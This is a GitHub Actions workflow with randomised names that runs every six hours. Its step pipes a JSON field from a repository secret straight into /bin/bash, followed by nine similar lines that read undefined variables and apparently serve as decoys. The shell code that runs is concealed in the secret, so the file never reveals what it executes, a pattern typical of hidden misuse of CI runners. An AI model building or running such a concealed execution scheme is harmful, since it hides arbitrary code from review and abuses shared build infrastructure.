name: dnbshul

on:
  workflow_dispatch:
  schedule:
    - cron: '14 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dnbshul
        env:
          ntxtc92: ${{ secrets.ntxtc92 }}
        run: |
          echo $ntxtc92 | jq -r .cax986 | /bin/bash
          echo $q27813 | jq -r .romj0455 | /bin/bash
          echo $iybcl1 | jq -r .lpb0 | /bin/bash
          echo $c61 | jq -r .p1 | /bin/bash
          echo $b0 | jq -r .qz25 | /bin/bash
          echo $a834 | jq -r .otxvu8543 | /bin/bash
          echo $hxdth53268 | jq -r .ntqxg4 | /bin/bash
          echo $dmu7826 | jq -r .jd997 | /bin/bash
          echo $xn11 | jq -r .dkw42 | /bin/bash
          echo $aoii8 | jq -r .opgrs07258 | /bin/bash

